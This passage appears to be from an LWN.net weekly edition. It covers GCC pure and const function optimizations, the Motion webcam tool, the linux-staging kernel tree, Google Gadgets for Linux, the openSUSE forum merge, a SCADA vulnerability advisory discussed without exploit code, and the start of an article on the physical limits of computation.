      from the parameters (it is the same as the first parameter), but
      global memory is affected by the side effect of
      strcpy(), making it not pure.
    
      Because the global memory state remains untouched, two calls
      to the same pure function with the same parameters will have to
      return the same value. As we'll see, it is a very important
      assumption that the compiler is allowed to make.
    
      A special case of pure functions is constant functions. A pure
      function that does not access global memory, but only its
      parameters, is called a constant function. This is because the
      function, being unrelated to the state of global memory, will
      always return the same value when given the same parameters. The
      return value is thus derived directly and exclusively from the
      values of the parameters given.
    
      The way a constant function "consumes" pointers is very
      different from the way other functions do: it can handle them as
      both parameter and return value only if they are never
      dereferenced, for accessing the memory they are referencing
      would be a global memory access, which breaks the requirements
      of constant functions.
    
      Of course these requirements have to apply not only to the
      operations in the given function, but also recursively to all
      the functions it calls. One function can at best be of the same
      kind of the least restrictive kind of function it calls. So when
      it calls a normal function it can't be but a normal function
      itself, if it only calls pure functions it can be either pure or
      normal, but not constant, and if it only calls constant
      functions it can be constant.
    
      As with inlining, the compiler will be able
      to decide if a function is pure or constant, in case no
      attribute is attached to it, only if the function is
      static (with the exception of special cases for freestanding
      code and other advanced options). When a function is not static,
      even if it's local, the compiler will assume that the function
      can be overridden at link- or run-time so it will not make any
      assumption based on the body for the definition it may find.
    Optimizing Function Calls

      Why should developers bother with marking functions pure or
      constant, though? As I said, these two attributes help the
      compiler to know some semantic meaning of a function call, so
      that it can apply higher optimization than to normal functions.
    
      There are two main optimizations that can be applied to these
      kinds of functions: CSE
      (Common Sub-expression Elimination) and
      DCE (Dead Code
      Elimination). We'll soon see in detail, with the help of the
      compiler itself, what these two consist of. Their names,
      however, are already rather explicit: CSE is
      used to avoid duplicating the same code inside a function,
      usually factoring out the code before branching or storing the
      results of common operations in temporary variables (registers
      or stack), while DCE will remove code that
      would never be executed or that would be executed but never
      used.
    
      These are both optimization that can be implemented in the
      source code, to an extent, reducing the usefulness of declaring
      functions pure or constant. On the other hand, as I'll
      demonstrate, doing so often reduces the readability of the code
      by obscuring the actual algorithm in favor of making it
      faster. This does not apply to all cases though, sometimes, doing
      the optimization "manually", directly in the source code, makes
      it more readable, and makes the code resemble the output of
      the compiler more.
    
About Assemblers and Examples

	When talking about optimization, it's quite difficult to
	visualize the task of the compiler, and the way the code
	morphs from what you read in the C source code into what the
	CPU is really going to execute. For this reason, the best way
	to write about them is to use examples, showing what the
	compilers generates starting from the source code.
      
	Given the way in which GCC works, this is actually quite
	easy. You just need to enable optimization and append the
	-S switch to the gcc
	command line. This switch stops the compiler after the
	transformation of C source code into assembly, before the
	result is passed to the assembler program to produce the
	object file.
      
	Although I suspect a good fraction of the people reading this article
	would be comfortable reading IA-32 or x86-64 assembly code, I
	decided to use the Blackfin
	[1]
	assembly language, which should be readable for people who
	have never studied a particular assembly language.
	
	The Blackfin assembler is more symbolic than IA-32: instead of
	having operations named movl and
	addq, the operations are identified by
	their algebraic operators (=,
	+), while the registers are merely called
	R1, R2 and so on.
      
	Calling conventions are also quite easy to understand: for all
	the cases we'll look through in the article (at most four
	parameters, integers or pointers), the parameters are passed
	through the registers, starting in order from
	R0. The return value of the function call
	is also stored in the R0 register.
      
	To clarify the examples which will appear later on, let's see
	how the following C source code is translated by GCC into
	Blackfin code:
      
	becomes:
      
 
	    As the Blackfin does not have 32 bit immediate load, you
	    have to load high and low addresses separately (in
	    whichever order); the assembler will take care of properly
	    loading the high 16 bits of the label to the upper
	    part of the register, and the low 16 bits to the lower part.
	  
	    Once the parameters are loaded, the function is called
	    almost identically to any other call
	    operation on other architectures; note the prefixed
	    underscore on symbols' names.
	  
	    Integers, both constant or parameters and variables, are
	    also loaded for calls in the registers. Blackfin doesn't
	    have 32 bit immediate loading, but if the constant to load
	    fits into 16 bits, it can be loaded through sign extension
	    by appending the (X) suffix.
	  
	    When accessing a global memory location, the
	    P2 pointer is set to the address of the
	    memory location...
	  
	    ... and then dereferenced to assign that memory
	    area. Being a RISC architecture, Blackfin does not have
	    direct memory operations.
	  
	    The return value for a function is loaded into the
	    R0 register, and can be accessed from
	    there.
	  
	    The rts command is the return from
	    subroutine, and usually indicates the end of the function,
	    but like the return statement in C,
	    it might appear in any place of the routine.
	  

	In the following examples, the preambles with declarations and
	data will be omitted whenever these are not useful to the
	discussion.
      
	Concerning optimization levels, the code will almost
	always be compiled with at least the first optimization level
	enabled (-O1). This both because it makes the code cleaner to
	read (using register-register copy for parameters passing,
	instead of saving to the stack and then restoring from that)
	and because we need optimization enabled to see how they are
	applied.
      
	Also, most of the times I'll refer to the
	fastest alternative. Most of what I say,
	though, applies also to the smaller
	alternative when using the -Os optimization level. In any
	case, the compiler always weighs the cost-to-benefit ratio
	between the optimized and the unoptimized version, or between
	different optimized versions. If you want to know the exact
	route the compiler takes for your code, you can always use the
	-S switch to find out.
      DCE and Unused Variables
	One area where DCE is useful
	is to avoid operations that result in unused data. It's
	not that uncommon that a variable is defined by an operation,
	complex or not, and is then never used by the code, either
	because it is intended for future expansion or because it's a
	remnant of older code that has been removed or replaced. While
	the best thing would be to get rid of the definition entirely,
	users expect the compiler to produce a good result with sloppy
	code too, and that operation should not be emitted.
      
	The DCE pass can remove all the code that
	has no side effect, when its result is not used. This includes
	all mathematical operations and functions known to be pure or
	constant (as neither are allowed to change the global state of
	the variables). If a function call is not known to be at least
	pure, it may change the global state, and its call will not be
	eliminated, as shown in the following code:
      
	Which, once compiled with -O1,
	[2]
	produces the following Blackfin assembler:
      
	As you can see, the call to the pure function has been
	eliminated (the res2 variable was not being
	used), together with the algebraic operation but, the impure
	function, albeit having its return value discarded, is still
	called. This is due to the fact that the compiler emits the
	call, not knowing whether the latter function has side
	effects on the global memory state or not.
      
	This is equivalent to the following code (which
	produces the same assembler code):
      
	The Dead Code Elimination optimization can be very helpful to
	reduce the overhead caused by code written to conform to C89
	standard, where you couldn't mix variables (and constant)
	declarations with executable code.
      
	In those sources, you had to declare variables at the top of
	the function, and then start to check for prerequisites. If
	you wanted to make it explicit that some variable had to keep
	its value, by making it constant, you would often have to fill
	them before the prerequisites could be checked.
      
	Without discussing legacy code, it is also useful when
	writing debug code, so that it doesn't look out of place from
	the use of lots of #ifdef directives. Take
	for instance the following code:
      
	The assert_se macro has different
	behavior from the standard assert, as it
	has side effects, which basically means that the code passed
	to the assertion is called even though the compiler is told to
	disable debugging. This is a somewhat common trick, although
	its effects on readability are debatable.
      
	With getsomestring() pure, when compiling
	without debugging, the DCE will remove the calls to all three
	functions: getsomestring(),
	strncmp() and
	strlen() (the latter two are usually
	declared as pure by both the C library and by GCC's built-in
	replacements). This because none of these functions have a
	side effect, resulting in a very short function:
      
	If our getsomestring() function weren't
	pure, even though its return value is not going to be used,
	the compiler would have to emit the call, resulting in rather
	more complex (albeit still simple, compared with most
	real-world functions) assembler code:
      
	Common Sub-expression Elimination
      
	The Common Sub-expression Elimination optimization is one of
	the most important optimizations performed by the compiler,
	because it's the one that, for instance, replaces multiple
	indexed accesses to an array so that the actual memory address
	is calculated just once.
      
	What this optimization does is to find common operations
	executed on the same operands (even when they are not known at
	compile-time), decide which ones are more expensive than
	saving the result in a temporary (register or stack), and then
	swapping the code around to take the cheapest course.
      
	While its uses are quite varied, one of the easiest ways to
	see the work of the CSE is to look at the
	code generated when using the ternary if
	operator. Let's take the following code:
      
	The compiler will optimize the code as:
      
	As you can see, the pure function is called just once, because the
	two references inside the ternary operator are equivalent,
	while the other one is called twice. This is because there was
	no change to global memory known to the compiler between the
	two calls of the pure function (the function itself couldn't
	change it – note that the compiler will never take
	multi-threading into account, even when asking for it
	explicitly through the -pthread flag),
	while the non-pure function is allowed to change global memory
	or use I/O operations.
      
	The equivalent code in C would be something along the
	following lines (it differs a bit because the compiler will
	use different registers):
      
	The Common Sub-expression Elimination optimization is very
	useful when writing long and complex mathematical
	operations. The compiler can find common calculations even
	though they don't look common to the naked eye, and act on
	those.
      
	Although sometimes you can get away with using multiple
	constants or variables to carry out temporary operations so
	that they can be re-used in the following calculations,
	leaving the formulae entirely explicit is usually more
	readable, as long as the formulae are not intended to change.
      
	Like with other algorithms, there are some advantages to
	reducing the source code used to calculate the same thing; for
	instance you can easily make a change directly to the
	definition of a constant and get the change propagated to all
	the uses of that constant. On the other hand, this can be
	quite a problem if the meaning of two calculations is very
	different (and thus can vary in different ways with the
	evolution of the code), and just happen to be calculated in
	the same way at a given time.
      
	Another rather useful place where the compiler can further
	optimize code with CSE, where it wouldn't be so nice or simple
	to do manually in the source code, is where you deal with
	static functions that are inlined by the compiler.
      
	Let's examine the following code for instance:
      
	In this code, you can find four basic expressions:
	(p1 * 16), (p2 *
	16), (3 &lt;&lt; a) and
	(4 &lt;&lt; b). Each of these four
	expressions is used twice in the
	somefunc() function. Thanks to the CSE,
	though, the code will calculate each of them once, even
	though they cross the function boundary, producing the
	following code:
      
	As you can easily see (the assembly was modified a bit to
	improve its readability, the compiler re-ordered loads of
	registers to avoid pipeline stalls, making it harder to see the
	point), the four expressions are calculated first, and stored
	respectively in the registers R0,
	R1, R7 and
	R3.
      
	These kinds of sub-expressions are usually harder to see in
	the code and also harder to implement. Sometimes they get
	factored out on their own parameter, but that can be more
	expensive during execution, depending on the calling conventions
	of the architecture.
      Cheats
	As I wrote above, there are some requirements that apply to
	functions that are declared pure and constant, related to not
	changing or accessing global memory; not executing I/O
	operations; and, of course, not calling further impure
	functions. The reason for this is that the compiler will
	accept what the user declares the function to be, whatever its
	body is (as it's usually unknown by the compiler at the call
	stage).
      
	Sometimes, though, it's possible to fool the compiler so that
	it treats impure functions as pure or even constant
	functions. Although this is a risky endeavor, as it might
	truly cause bad code generation by the compiler, it can
	sometimes be used to force optimization for particular
	functions.
      
	An example of this can be a lookup function that scans through
	a global table to return a value. While it is accessing global
	memory, you might want the compiler to promote it to a
	constant function, rather than simply to a pure one.
      
	Let's take for instance the following code:
      
	If the lookup() function is only
	considered a pure function, as it is, adhering to the rules we
	talked about at the start of the article, it will be called
	three times in testfunction(), like this:
      
	Instead, we can trick the compiler by declaring the
	lookup() function as constant (the data
	it is reading is constant, after all, so at a given parameter
	it will always return the same result). If we do that, the
	three calls will have to return the same value, and the
	compiler will be able to optimize them as a single call:
      
	In addition to lookup functions on constant tables, this
	trick is useful with functions which read data from files or
	other volatile data, and cache it in a memory variable.
      
	Take for instance the following function that reads an
	environment variable:
      
	This is not truly a constant function, as its return value
	depends on the environment. Even so, assuming that the
	environment of the process is left untouched, its return value
	will never change between calls. Even though it will affect
	the global state of the program (as the
	cachedval static variable will be filled in
	the first time the function is called), it can be assumed to
	always return the same value.
      
	Tricking the compiler into thinking that a function is constant
	even though it has to load data through I/O operations, as I
	said, is risky, as the compiler will think there is no I/O
	operation going on; on the other hand, this trick might make a
	difference sometimes, as it allows the expression of functions
	in more semantic ways, leaving it up to the compiler to
	optimize the code with temporaries, where needed.
      
	One example can be the following code:
      Note:
	  To make sure that the compiler won't reduce the three
	  function calls to their return values right away, the static
	  sub-functions return values taken from global variables; the
	  meanings of those variables are not important.
	
	Considering the above source code, if
	get_testval() is impure, as the compiler
	will automatically find it to be, it will be compiled into:
      
	As you can see, the get_testval() is
	called twice, even though its result will be identical. If we
	declare it constant, instead, the code of our test function
	will be the following:
      
	The CSE pass combines the two calls to
	get_testval with one. Again, this is one
	of the optimizations that are harder to achieve by manually
	changing the source code since the compiler can have a larger
	view of the use of its value. A common way to handle this is
	by using global variables, but that might require one more
	load from the memory, while CSE can take care of keeping the
	values in registers or on the stack.
      Conclusions
      After what you have read about pure and constant functions, you
      might have some concerns about the average use of them. Indeed,
      in a lot of cases, these two attributes allow the compiler to do
      something you can easily achieve by writing better code.
    
      There are two objectives you have to keep in mind that are
      related to the use of these (and other) attributes. The first is
      code readability because sometimes the manually optimized
      functions are harder to read than what the compiler can
      produce. The second is allowing the compiler to optimize legacy
      or external code.
    
      While you might not be too concerned with letting legacy code or
      code written by someone else get away with slower execution, a
      pragmatic view of the current Free Software world should take
      into consideration the fact that there are probably thousands
      lines of code of legacy code around.  Some of that code, written with
      pre-C99 declarations, might be even
      using 
      libraries that are being developed with their older interface,
      which could be improved by providing some extra semantic
      information to the compiler through use of attributes.
    
      Also, it's unfortunately true that extensive use of these
      attributes might be seen by neophytes as an easy solution to let
      sloppy code run at a decent speed. On the other hand, the same
      attributes could be used to identify such sloppy code through
      analysis of the source code.
    
      Although GCC does not issue warnings for all of these cases, it
      already warns for some of them, like unused variables, or
      statements without effect (both triggered by the
      DCE). In the future more warnings might be
      reported if pure and constant functions get misused.
    
      In general, like with many other GCC function attributes, their
      use is tightly related to how programmers perceive their
      task. Most pragmatic programmers would probably like these
      tools, while purists will probably dislike the way these
      attributes help sloppy code to run almost as fast as properly
      written code.
    
      My hopes are that in the future better tools will make good use
      of these and other attributes on different levels than
      compilers, like static and dynamic analyzers.
    [1] 
	    The Blackfin architecture is a RISC architecture developed
	    by Analog Devices, supported by both GCC and Binutils (and
	    Linux, but I'm not interested in that here).
	  [2] 
	    I have chosen -O1 rather than -O2 because in the latter
	    case the compiler performs extra optimization passes that
	    I do not wish to discuss within the scope of this article.
	  

		Detect and record video movement with Motion


Motion
is a video application that monitors a video4linux device such as a
USB camera and records movement within the image:


Motion is a program that monitors the video signal from one or more cameras and is able to detect if a significant part of the picture has changed; in other words, it can detect motion.
The program is written in C and is made for the Linux operating system. Motion is a command line based tool whose output can be either jpeg, ppm fies or mpeg video sequences.


An installation of Motion was performed on a machine with a 3Ghz
Athlon 64 processor running Ubuntu 7.04 (Feisty Fawn).
The most recent version of Motion (v 3.2.10.1) was

downloaded, the file was uncompressed and untared.
The normal configure, make and make install steps were performed.
If one wishes to record mpeg movies, the libavcodec and libavformat
libraries must be installed prior to running configure.


The make install step needed a bit of manual intervention,
it was necessary to create the /var/run/motion directory and
copy the motion-dist.conf configuration file to
/usr/local/etc/motion.conf.  The config file was modified to
define a USB camera, the camera's default resolution was defined
and the destination directory for images was set.
The framerate parameter was changed to 2 seconds to slow down the
rate of accumulation of image files.

<!-- LWNPutAdHere -->

A Kensington Model 67015 VideoCAM VGA USB camera was plugged into
the computer.
It is a good idea to run a real-time video monitoring application such as
xawtv or
EffecTV (in DumbTV
mode) to adjust the camera's focus, brightness and contrast settings.
Running Motion was simply a matter of typing "motion"
on the command line.  The program takes about 25 seconds to start
recording movement, presumably most of this time is spent learning
the contents of the video.  After this delay, the software would
output a line of text and create one .jpg file for each movement
it detected.  The images were inspected with the

Mirage image viewer and a changing sequence of static images was
observed.


Motion has a wide variety of capabilities and configurable
parameters.  The

Motion Guide and

Config File Options are a good place to read about the
various capabilities and the

FAQ gives answers to common questions.


One can imagine a number of uses for Motion, cube farm denizens could
find out what is causing their pens to disappear at night, people in high
crime areas could use it to catch vandals and thieves in the act.
The on_picture_save configuration directive can execute a script
on motion detection, this could be used to copy captured images to
a distant web server for remote monitoring.
This feature was tested by adding a line like this:
on_picture_save scp %f remote-host:/directory-path
to the config file, the operation worked as expected.


It should be noted that inexpensive USB cameras may only work in a
very limited set of lighting conditions.  Serious surveillance
would require an NTSC or PAL video input adapter and a better
camera, or a high resolution webcam.


Apparently, no major releases of Motion have been released in a long
time, but the developers'

mail archive shows that recent work has been done on the project.
A new point release just showed up this week, it added a fix
for a security bug.


If you are looking for a way to do automated video surveillance,
Motion is an excellent tool for the job.


		A new kernel tree: linux-staging


There's a new kernel tree in town.  The linux-staging tree was announced by Greg Kroah-Hartman
on 10 June.  It is meant to hold drivers and other kernel patches that are
working their way toward the mainline, but still have a ways to go.  The
intention is to collect them all together in one tree to make access and
testing easier for interested developers.


According to Kroah-Hartman, linux-staging (or -staging as it will
undoubtedly 
be known) "is an outgrowth of the Linux Driver Project, and the fact
that
there have been some complaints that there is no place for individual
drivers to sit while they get cleaned up and into the proper shape for
merging."  By collecting the patches in one place, it will increase
their visibility in the kernel community, potentially attracting more
developers to assist in fixing, reviewing, and testing them.


The intent is for -staging to house self-contained
patches—Kroah-Hartman mentions drivers and filesystems—that
should not affect anyone who is not using them.  Because of that, he is
hoping that -staging can get included in the linux-next tree.  As he says to
Stephen Rothwell, maintainer of -next, in
the announcement:

Yes, I know it contains things that will not be included in the
     next release, but the inclusion and basic build testing that is
     provided by your tree is invaluable.  You can place it at the
     end, and if there is even a whiff of a problem in any of the
     patches, you have my full permission to drop them on the floor
     and run away screaming (and let me know please, so I can fix it
     up.)


The -next tree is meant for things that are headed for inclusion in the
"N+1" kernel (where 2.6.N is the release under development), so including
code not meant for that release is bending the rules a bit.  As of this
writing, Rothwell has not responded to the
request to include -staging, but it would clearly benefit those patches to
have a wider audience—with only a small impact on -next.  There is no
set timeline for patches to move from -staging into mainline, Kroah-Hartman
says: 

Based on some of the work that is needed on some of these drivers, it is
much longer than N+2, unless we have some people step up to help out
with the work.  It's almost all janitorial work to do, but I know I
personally don't have enough time to do it all, and can use the help.


The -staging tree is seen as a great place for Kernel Janitors and others
who are interested in learning about kernel development to get their
start.  The announcement notes: "The code in this tree
is in desperate need of cleanups and fixes that can be trivially
found using 'sparse' and 'scripts/checkpatch.pl'."  In the
process of cleaning up the code, folks can learn how to create patches and
how to get them accepted into a tree.  From there, the hope is that more
difficult tasks will be undertaken—with -staging or other kernel
code—leading to a new crop of kernel hackers.


The current status of -staging shows 17
patches, most of which are drivers from the Linux Driver Project.
Kroah-Hartman is actively encouraging more code to be submitted for
-staging, as long as it meets some criteria for the tree.  The tree is
not meant to be a dumping ground for drivers that are being "thrown
over the wall" in hopes that someone else will deal with them.  It is also
not meant for code that is being actively worked on by a group of
developers in another tree somewhere—the reiser4 filesystem is
mentioned as an 
example—it is for code that would otherwise languish.


The reaction on linux-kernel has so far been favorable, with questions
being asked 
about what kinds of patches are appropriate for the tree, in particular new architectures.  The -staging tree fills a
niche that has not yet been covered by other trees.  It also serves
multiple purposes, from giving new developers a starting point to providing
additional reviewing and testing opportunities for new drivers and other
code.  With luck, that will hasten the arrival of new features—along
with new developers.


		Google announces Gadgets for Linux


Google recently announced
the release of their Gadgets for the Linux desktop, and, unlike some of
their other
desktop offerings, they released it under a free software license.  While
it is not earth-shattering technology, Gadgets does provide some
interesting features and amusing diversions.  It also generates some hope
that Google is getting better at understanding what free software users are
looking for, so perhaps things like the Google Desktop for Linux will be
better integrated and more useful in the future.


Gadgets are a
cross-platform way to create simple applications that can run on web pages
and desktops.  The gadget API provides a means to retrieve content from
other sites and display it along with a user interface.  Many kinds of
applications can be created, from clocks and calendars to RSS-feedreaders
and "picture of the day" viewers.


There are numerous gadgets available, a semi-random collection on a KDE
desktop can be seen at left.  Google has created a handful of gadgets, but
the vast majority are available from others in various categories including
News, Sports, Finance, Fun and Games, Technology, and Communication.  The
gadget browser shown below, at right, allows easy access to an amazing
number of choices, many of which are variations on a theme.


To get started with gadgets, it is first necessary to build the tool.
Google does not yet provide .rpm or .deb files for various distributions.
The "how
to build" page was useful, but there was some difficulty in trying to
translate the dependencies 
into Fedora 9 package names.  A page
in a language I don't know needed no translation, however.  Linux commands,
it seems, are multi-lingual. 


Building from the Apache-licensed source tarball was straightforward after
that.  Gadgets for Linux comes in both 
GTK+ and Qt flavors which allows for integration with the two dominant
Linux desktop environments.  The screenshots accompanying this article are
from the Qt version, but a bit of a look at the GTK+ version seemed roughly
the same—though the Qt version lacks the sidebar dock.


This is a beta release, perhaps more of a beta than many Google releases,
so there are still a fair number of glitches.  Perhaps 20% of the gadgets
tried had one problem or another, with some seeming not to function at
all.  Having no experience with gadgets on other platforms, it was not
clear whether these were caused by bugs in the gadgets themselves or the
desktop 
gadget program.


The main benefit of the gadget API seems to be the cross-platform
capabilities.  Gadgets can run—largely unchanged—on Linux, Mac OS
X, or Windows, but can also run in browsers on web pages at social
networking sites or on other pages.  If the API can deliver that wide of a
range of platform choices, it could open up a much wider audience for folks
that want to develop their gadgets on Linux.


Still missing is one of the tools recommended for developing gadgets, Gadget
Designer, which is only available for Windows.  The documentation
for creating a gadget make it look like a tedious exercise in XML
manipulation and Javascript programming, but there may be tools available
or in development to make some of that easier.


Overall, gadgets look like an interesting project.  There is really nothing
new about the kinds of applications that can be built using the API, but
there are few choices to build those kinds of programs in a truly cross-platform way.
Google's choice to support Linux—and support it
well—accompanied by the code under a
free software license is, perhaps, the best news of all.


		openSUSE merges forums ahead of 11.0 release


The openSUSE project announced this week it has merged its three largest English-language community support forums under one big green umbrella and relaunched it as the openSUSE Forums. According to data supplied by openSUSE, the combined number of suseforums.net, suselinuxsupport.de, and openSUSE Novell support forum members was in the tens of thousands &amp;mdash a number expected to rise with the upcoming release of openSUSE 11.0.
Even though the new forums are already up and running smoothly, the team has no intention of resting on its laurels. They're already working on implementing similar changes with forums in other languages and better integration with the rest of the site.
Project Manager Rupert Horstkötter says there are also plans for a "user-rating for the whole openSUSE community, integrated with forums.opensuse.org, and all other openSUSE services. Besides all of that, we hope to be able to attract more independent forum communities for the official openSUSE forums."
Keith Kastorff, the site admin for suseforums.net says the idea began to take shape during an openSUSE project meeting back in 2007. "A big topic was the need for an 'official' openSUSE forum, and the duplication of effort, expertise, and resources we had in play," he recalls. "I volunteered to reach out to some of the independent SUSE focused forums to see if I could generate any interest in a merge." Then he contacted people involved with Novell and suselinuxsupport.de and "things moved forward from there."
Kastorff says getting the project underway was slow going at first and admits that some members were wary of Novell's involvement. "The open source community is sometimes skeptical of commercial players, but we found nothing but tremendous support from Novell," he says. 
It's not surprising there were a number of technical hurdles to overcome in bringing the three forums together. One of the main issues included an inability to merge the member databases and it was eventually decided to simply archive them within a section of the new forum. "Like any project, we had to make compromises to achieve the end goal," says Kastorff. "We knew going in we had different cultures in play, and there were times the dialogs between the various merging staffs got intense, but the team's strong commitment to bettering the openSUSE community kept us focused on the prize."
Indeed, it was a team effort. More than 30 people worked behind the scenes to import the help sections of the separate forums and archive over 400,000 posts prior to launching forums.opensusue.org. In order for the project to work, the various groups &amp;mdash each with their own goals and ideas &amp;mdash needed to work together and trust in the end goal. 
Horstkötter says it was "a lot of work to combine different cultures into one big forum for the openSUSE community, but it was a great time. I feel like I met some new friends during the project."
"We had three teams &amp;mdash one from Novell, two from different grassroots projects that had sprung up to serve the community and had developed their own style and ways of working together," recalls openSUSE Product Manager Michael Löffler "To merge the three, the staff for each forum had to be comfortable putting all their eggs in one basket (Novell hosting the forums) and agreeing on a common set of rules, moderation guidelines, etc. It took some time and effort to work everything out, but I think that the three teams are working quite well together now."
Just as important as teams working together is the impact that merged forums will have on the openSUSE community overall. "Having a unified forum means that all interested users can converse and support one another in one location &amp;mdash so you don't have the duplication of effort." says Löffler. "I'm really glad [they] launched in time for 11.0 &amp;mdash I expect that a lot of new users are going to be interested in openSUSE with this release, and I am very happy we have the forums to help support them."

		SCADA system vulnerabilities


Core Security released a security
advisory on 11 June that details a fairly pedestrian stack-based buffer
overflow vulnerability.  This is similar to hundreds or thousands of this
kind of flaw reported over the years except for one thing: it was found in
large industrial control systems for things like power and water utility
companies.   That there is a vulnerability is not surprising—there
are certainly many more—but it does give one pause
about the dangers of connecting these systems to the
internet. 


The bug was found in a Supervisory Control and Data
Acquisition—better known as SCADA—system and could be
exploited to execute arbitrary code.  Given that SCADA systems run much of
the world's infrastructure, an exploit of a vulnerable system could have
severe repercussions.  The customers of Citect, the company that makes the
affected systems, include "organizations in the aerospace, food,
manufacturing, oil and gas, and public utilities industries."


Makers of SCADA systems nearly uniformly tell their customers to keep those
systems isolated from the internet.  But as Core observes: "the
reality is that many organizations do have their process control networks
accessible from wireless and wired corporate data networks that are in turn
exposed to public networks such as the Internet."  So, the potential
for a random internet bad guy to take control of these systems does exist.


None of that should be particularly surprising when you stop to think about
it, but it is worrying.  Many SCADA systems—along with various
other 
control systems—were designed and developed long before the internet
started reaching homes and offices everywhere.  They were designed for
"friendly" environments, with little or no change for the hostile
environment that characterizes today's internet.  Also, as we have seen,
security rarely gets the attention it deserves until some kind of ugly
incident occurs.


Even for systems that were designed recently, there are undoubtedly
vulnerabilities, so it is a bit hard to believe that they might be
internet-connected.  According to the advisory, though, SCADA makers do not
necessarily require that the systems be physically isolated from the
network, instead customers can "utilize technologies including firewalls
to keep them protected from improper external communications."


Firewalls—along with other security techniques—do provide a
measure of protection, but with the stakes so high, it would seem that more
caution is required.  It is probably convenient for SCADA users to be able
to connect to other machines on the LAN, as well as to the internet, but
with that convenience comes quite a risk.  Even systems that are just
locally connected could fall prey to a disgruntled employee exploiting a
vulnerability to gain access to systems they normally wouldn't have.


One can envision all manner of havoc that could be wreaked by a malicious
person (or government) who can take over the systems that control nuclear
power plants, enormous gas pipelines, or some chunk of the power grid.
Unfortunately, it will probably take an incident like that to force these
industries into paying as much attention to their computer security as they
do to their physical security.  


		The Kernel Hacker's Bookshelf: Ultimate Physical Limits of Computation


Moore's Law - we all know it (or at least think we do).

To be annoyingly exact, Moore's Law is a prediction that the number of
components per integrated circuit (for minimum cost per component)
will double every 24 months (revised up from every 12 months in the
original 1965 prediction).  In slightly more useful form, Moore's
Law is often used as a shorthand for the continuing exponential growth
of computing technology in many areas - disk capacity, clock speed,
random access memory.  Every time we approach the limit of some key
computer manufacturing technology, the same debate rages: Is this the
end of Moore's Law?  So far, the answer has always been no.


But Moore's Law is inherently a statement about human ingenuity,
market forces, and physics.  Whenever exponential growth falters in
one area - clock speed, or a particular mask technique - engineers
find some new area or new technique to improve at an exponential pace.
No individual technique experiences exponential growth for long,
instead migration to new techniques occurs fast enough that the
overall growth rate continues to be exponential.


The discovery and improvement of manufacturing techniques is driven on
one end by demand for computation and limited on the other end by
physics.  In between is a morass of politics, science, and plain old
engineering.  It's hard to understand the myriad forces driving demand
and the many factors affect innovation including economies of scale,
cultural attitudes towards new ideas, vast marketing campaigns, and the
strange events that occur during the death throes of megacorporations.
By comparison, understanding the limits of computation is
easy, as long as you have a working knowledge of quantum physics,
information theory, and the properties of black holes.

The "Ultimate Laptop"

In a paper published in Nature in 2000,
Ultimate
Physical Limits of Computation (free
arXiv preprint
[PDF] here), Dr. Seth Lloyd calculates (and explains) the limits of
computing given our current knowledge of physics.  Of course, we don't
know everything about physics yet - far from it - but just as in other
areas of engineering, we know enough to make some extremely
interesting predictions about the future of computation.  This paper
wraps up existing work on the physical limits of computing and
introduces several novel results, most notably the ultimate speed
limit to computation.  Most interesting in my mind is the calculation
of a surprisingly specific upper bound on how many years a generalized
Moore's Law can remain in effect (keep reading to find out exactly how
long!).


Dr. Lloyd begins by assuming that we have no idea what future computer
manufacturing technology will look like.  Many discussions of the
future of Moore's Law center around physical limits on particular
manufacturing techniques, such as the limit on feature size in optical
masks imposed by the wavelength of light.  Instead, he ignores
manufacturing entirely and uses several key physical constants: the
speed of light c, Planck's reduced constant h
(normally written as h-bar, a symbol not available in standard HTML,
so you'll have to just imagine the bar), the gravitational
constant g, and Boltzmann's constant kB.  These
constants and our current limited understanding of general relativity
and quantum physics are enough to derive many important limits on
computing.  Thus, these results don't depend on particular
manufacturing techniques.


The paper uses the device of the "Ultimate Laptop" to help make the
calculations concrete.  The ultimate laptop is one kilogram in mass
and has a volume of one liter (coincidentally almost exactly the same
specs as a 2008 Eee PC), and
operates at the maximum physical limits of computing.  Applying the
limits to the ultimate laptop gives you a feel for the kind of
computing power you can get in luggable format - disregarding battery
life, of course.

Energy limits speed

So, what are the limits?  The paper begins with deriving the ultimate
limit on the number of computations per second.  This depends on the
total energy, E, of the system, which can be calculated using
Einstein's famous equation relating mass and energy, E =
mc2. (Told you we'd need to know the speed of light.)
Given the total energy of the system, we then need to know how quickly
the system can change from one distinguishable state to another -
i.e., flip bits.  This turns out to be limited by the Heisenberg
uncertainty principle.  Lloyd has this to say about the Heisenberg
uncertainty principle:


In particular, the correct interpretation of the time-energy
Heisenberg uncertainty principle ΔEΔt ≥ h
is not that it takes time Δt to measure energy to an accuracy
ΔE (a fallacy that was put to rest by Aharonov and Bohm) but
rather that that a quantum state with spread in energy ΔE takes
time at least Δt = πh/2ΔE to evolve to an
orthogonal (and hence distinguishable) state. More recently, Margolus
and Levitin extended this result to show that a quantum system with
average energy E takes time at least Δt = πh/2E
to evolve to an orthogonal state.


In other words, the Heisenberg uncertainty principle implies that a
system will take a minimum amount of time to change in some observable
way, and that the time is related to the total energy of the system.
The result is that a system of energy E can
perform 2E/πh logical operations per second (a logical
operation is, for example, performing the AND operation on two bits of
input - think of it as single bit operations, roughly).  Since the
ultimate laptop has a mass of 1 kilo, it has energy 
E = mc2 = 8.9874 x 1016 joules.  The ultimate
laptop can perform a maximum of 5.4258 x 1050 operations
per second.


How close are we to the 5 x 1050 operations per second
today?  Each of these operations is basically a single-bit operation,
so we have to convert current measurements of performance to their
single-bit operations per second equivalents.  The most commonly
available measure of operations per seconds is FLOPS (floating point
operations per second) as measured by LINPACK (see
the Wikipedia page on
FLOPS).  Estimating the exact number of actual physical single-bit
operations involved in a single 32-bit floating point operation would
require proprietary knowledge of the FPU implementation.  The number
of FLOPS as reported by LINPACK varies wildly depending on compiler
optimization level as well.  For this article, we'll make a wild
estimate of 1000 single-bit operations per second (SBOPS) per FLOPS,
and ask anyone with a better estimate to please post it in a comment.


With our FLOPS to SBOPS conversion factor of 1000, the current LINPACK
record holder, the Roadrunner supercomputer (near my home town,
Albuquerque, New Mexico), reaches speeds of one petaflop, or 
1000 x 1015 = 1 x 1018
SBOPS.  But that's for an entire 
supercomputer - the ultimate laptop is only one kilo in mass and one
liter in volume.  Current laptop-friendly CPUs are around one
gigaflop, or 1012 SBOPS, leaving us about 39 orders of
magnitude to go before hitting the theoretical physical limit of
computational speed.  Finally, existing quantum computers have already
attained the ultimate limit on computational speed - on a very small
number of bits and in a research setting, but attained it nonetheless.

Entropy limits memory

What we really want to know about the ultimate laptop is how many
legally purchased DVDs we can store on it.  The amount of data a
system can store is a function of the number of distinguishable
physical states it can take on - each distinct configuration of memory
